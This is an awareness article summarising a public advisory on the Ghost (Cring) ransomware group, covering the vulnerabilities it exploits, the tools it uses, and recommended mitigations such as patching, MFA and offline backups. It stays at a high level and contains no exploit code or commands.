Introduction
As the world rapidly advances, cybercrime is evolving at an alarming rate. Every day, organizations across the globe fall victim to these digital attacks. Among the most devastating cyber threats are ransomware attacks, where attackers lock or encrypt a victim’s data, demanding a ransom in exchange for restoring access.
In recent years, the frequency and sophistication of these attacks have surged, with one of the most notorious groups being the Ghost actors. This article will explore the tactics, techniques, and procedures (TTPs) used by Ghost actors and the vulnerabilities they exploit to carry out ransomware attacks.
What Are Ghost Actors?
Ghost actors, believed to be based in China, are notorious cybercriminals who indiscriminately target networks to deploy ransomware. They are primarily motivated by financial gain, and their attacks have led to the compromise of numerous critical organizations worldwide. These actors are known to use multiple aliases such as Ghost, Cring, Crypt3r, and others, making it difficult for cybersecurity experts to consistently attribute their attacks to a single group. The Ghost actors employ various tactics, such as rotating ransomware payloads, modifying file extensions for encrypted files, and varying ransom demands, which helps them evade detection and attribution.
Common Vulnerabilities and Exposures (CVEs) Targeted by Ghost Actors
Ghost actors typically exploit well-known vulnerabilities in widely used software to gain access to public-facing servers. Some of the most commonly targeted vulnerabilities include:
- Fortinet FortiOS (CVE-2018-13379)
- Microsoft Exchange’s ProxyShell attack chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)
- Adobe ColdFusion vulnerabilities (CVE-2010-2861, CVE-2009-3960)
These vulnerabilities provide attackers with opportunities to bypass defenses and infiltrate networks, often causing severe consequences when patches and security updates are not promptly applied. Cybercriminals exploit these weaknesses to gain unauthorized access to systems and deploy their ransomware payloads.
Attack Execution and Ransomware Deployment
Once inside a compromised network, Ghost actors commonly upload web shells to vulnerable servers. A web shell allows them to maintain remote control over the infected system. To further their goals, the attackers use PowerShell and Command Prompt to execute commands and download additional malware, such as Cobalt Strike. This malware facilitates lateral movement within the network, ultimately enabling the attackers to deploy ransomware to encrypt critical files and demand a ransom payment in return for restoring access.
Persistence and Privilege Escalation
Although persistence is not a significant focus for Ghost actors, who often act quickly to deploy ransomware, they do occasionally create new local accounts or change passwords to ensure continued access to compromised networks. In terms of privilege escalation, Ghost actors frequently use tools such as Cobalt Strike, SharpZeroLogon, and Mimikatz to steal system process tokens and elevate their privileges. This helps them gain deeper control over infected systems, making it harder for defenders to regain control.
Credential Access and Defense Evasion
Ghost actors often employ credential dumping techniques, such as using Mimikatz or Cobalt Strike’s “hashdump” function, to gather passwords or password hashes. These stolen credentials allow them to pivot and escalate their privileges to gain further access within the network. To evade detection, Ghost actors use a variety of defense evasion tactics, including the deployment of different ransomware variants and modifying ransom notes. By doing so, they attempt to obscure their true identity and activities, making it difficult for security teams to trace the attack back to the same group.
Mitigation and Recommendations
To protect against Ghost ransomware attacks, organizations must prioritize addressing vulnerabilities and employing best practices in cybersecurity. The following steps can help mitigate the risk of a successful ransomware attack:
- Patch Known Vulnerabilities
Promptly apply security patches for commonly exploited vulnerabilities, especially those related to CVEs targeted by Ghost actors. - Network Monitoring
Implement continuous network monitoring to detect unusual activity and identify threats at an early stage. - Multi-Factor Authentication (MFA)
Enforce the use of MFA across critical systems and applications to make it more difficult for attackers to gain unauthorized access. - Data Backups
Regularly back up all data at least critical data to offline or cloud-based storage. In the event of a ransomware attack, having backup copies can significantly reduce the impact. - Training and Awareness
Train employees to recognize phishing emails, avoid suspicious links, and follow best security practices. - Antivirus : not only to apply patches antivirus should also be configured properly.
Following guidance from trusted cybersecurity agencies like the FBI, CISA, and MS-ISAC can help organizations reduce the likelihood and impact of ransomware attacks. For a more detailed guide, organizations are encouraged to consult full advisories and apply the recommended mitigation strategies.
Conclusion
Ghost actors continue to pose a significant threat to organizations worldwide. Their ability to exploit common vulnerabilities, bypass defenses, and deploy ransomware rapidly highlights the need for strong cybersecurity practices. By maintaining vigilance, applying security patches promptly, and following expert recommendations, organizations can significantly improve their defenses against these persistent and evolving threats.
Additional Resources
For more information on Ghost ransomware attacks, including Indicators of Compromise (IOCs), organizations can download the following resources:
- STIX XML (79KB)
- STIX XML (Additional IOCs) (74KB)
- STIX JSON (68KB)
A PDF file is attached for further details and additional insights. Most of the content in this article is sourced from the provided PDF, created to raise awareness among organizations and individuals about the growing threat of ransomware attacks.
By utilizing these resources and adhering to cybersecurity best practices, organizations can better safeguard themselves against the growing threat of ransomware.